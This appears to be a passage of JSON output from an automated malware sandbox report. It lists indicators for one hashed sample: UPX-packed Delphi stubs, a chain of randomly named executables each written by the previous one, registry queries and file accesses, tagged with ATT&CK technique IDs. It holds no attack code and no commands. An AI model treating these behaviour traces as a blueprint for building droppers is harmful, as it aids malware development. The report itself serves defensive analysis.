\"UPX1\"\n \"hnldj.exe\" has an executable section named \"UPX0\"\n \"hnldj.exe\" has an executable section named \"UPX1\"\n \"txvhpv.exe\" has an executable section named \"UPX0\"\n \"txvhpv.exe\" has an executable section named \"UPX1\"\n \"800884.exe\" has an executable section named \"UPX0\"\n \"800884.exe\" has an executable section named \"UPX1\"\n \"800608.exe\" has an executable section named \"UPX0\"\n \"800608.exe\" has an executable section named \"UPX1\"\n \"082060.exe\" has an executable section named \"UPX0\"\n \"082060.exe\" has an executable section named \"UPX1\"\n \"22802.exe\" has an executable section named \"UPX0\"\n \"22802.exe\" has an executable section named \"UPX1\"\n \"2224020.exe\" has an executable section named \"UPX0\"\n \"2224020.exe\" has an executable section named \"UPX1\"\n \"8886462.exe\" has an executable section named \"UPX0\"\n \"8886462.exe\" has an executable section named \"UPX1\"\n \"dhpnj.exe\" has an executable section named \"UPX0\"\n \"dhpnj.exe\" has an executable section named \"UPX1\"\n \"bnhphvh.exe\" has an executable section named \"UPX0\"\n \"bnhphvh.exe\" has an executable section named \"UPX1\"\n \"64462.exe\" has an executable section named \"UPX0\"\n \"64462.exe\" has an executable section named \"UPX1\"\n \"tddht.exe\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"hnldj.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"txvhpv.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"800884.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"800608.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"082060.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"22802.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"2224020.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"8886462.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"dhpnj.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"bnhphvh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"64462.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"tddht.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"hfnrrt.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"drtpjh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"482486.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"0484408.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"2226066.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"60440.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"2822060.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"46000.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"644802.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"288022.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"446022.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"fdrnfdr.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"vftrx.exe\" trying to access non-existent file \"c:\\FLTLIB.DLL\"\n \"vftrx.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"vftrx.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"vftrx.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"vftrx.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"vftrx.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" reads file \"c:\\511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" reads file \"c:\\vftrx.exe\"\n \"vftrx.exe\" reads file \"c:\\vftrx.exe\"\n \"vftrx.exe\" reads file \"c:\\06626.exe\"\n \"06626.exe\" reads file \"c:\\06626.exe\"\n \"06626.exe\" reads file \"c:\\28482.exe\"\n \"28482.exe\" reads file \"c:\\28482.exe\"\n \"28482.exe\" reads file \"c:\\0260006.exe\"\n \"0260006.exe\" reads file \"c:\\0260006.exe\"\n \"0260006.exe\" reads file \"c:\\44628.exe\"\n \"44628.exe\" reads file \"c:\\44628.exe\"\n \"44628.exe\" reads file \"c:\\xlrdpdb.exe\"\n \"xlrdpdb.exe\" reads file \"c:\\xlrdpdb.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\VFTRX.EXE\"; Key: \"\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\\APPCERTDLLS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"vftrx.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"06626.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"28482.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"0260006.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"44628.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"xlrdpdb.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"lnxndll.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"8028040.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ndfntv.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"lvvdvpj.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"460060.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"8420244.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"bdppl.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"dtxrlp.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"pdbtf.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"pbbvvxt.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"jftjpxt.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"64226.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"28800.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"20046.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"8608268.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"6062268.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"6884282.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"4688686.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"511BCA581824F939CBA8F72AFB50C5D8838269F61C8D4E147CC37B8F55927F0E\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\APPCOMPAT\"; Key: \"DISABLEENGINE\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SHELL FOLDERS\"; Key: \"CACHE\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\"; Key: \"DISABLELOCALOVERRIDE\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" trying to touch file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" trying to touch file \"c:\\vftrx.exe\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" trying to touch file \"c:\\ui\\SwDRM.dll\"\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" trying to touch file \"C:\\Windows\\System32\\imm32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"vftrx.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"06626.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"28482.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"0260006.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"44628.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"xlrdpdb.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"lnxndll.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"8028040.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"ndfntv.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"lvvdvpj.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"460060.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"8420244.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" writes file \"c:\\vftrx.exe\"\n \"vftrx.exe\" writes file \"c:\\06626.exe\"\n \"06626.exe\" writes file \"c:\\28482.exe\"\n \"28482.exe\" writes file \"c:\\0260006.exe\"\n \"0260006.exe\" writes file \"c:\\44628.exe\"\n \"44628.exe\" writes file \"c:\\xlrdpdb.exe\"\n \"xlrdpdb.exe\" writes file \"c:\\lnxndll.exe\"\n \"lnxndll.exe\" writes file \"c:\\8028040.exe\"\n \"8028040.exe\" writes file \"c:\\ndfntv.exe\"\n \"ndfntv.exe\" writes file \"c:\\lvvdvpj.exe\"\n \"lvvdvpj.exe\" writes file \"c:\\460060.exe\"\n \"460060.exe\" writes file \"c:\\8420244.exe\"\n \"8420244.exe\" writes file \"c:\\bdppl.exe\"\n \"bdppl.exe\" writes file \"c:\\dtxrlp.exe\"\n \"dtxrlp.exe\" writes file \"c:\\pdbtf.exe\"\n \"pdbtf.exe\" writes file \"c:\\pbbvvxt.exe\"\n \"pbbvvxt.exe\" writes file \"c:\\jftjpxt.exe\"\n \"jftjpxt.exe\" writes file \"c:\\64226.exe\"\n \"64226.exe\" writes file \"c:\\28800.exe\"\n \"28800.exe\" writes file \"c:\\20046.exe\"\n \"20046.exe\" writes file \"c:\\8608268.exe\"\n \"8608268.exe\" writes file \"c:\\6062268.exe\"\n \"6062268.exe\" writes file \"c:\\6884282.exe\"\n \"6884282.exe\" writes file \"c:\\4688686.exe\"\n \"4688686.exe\" writes file \"c:\\4240462.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"hnldj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"txvhpv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"800884.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"800608.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"082060.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"22802.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2224020.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"8886462.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"dhpnj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"bnhphvh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"64462.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n 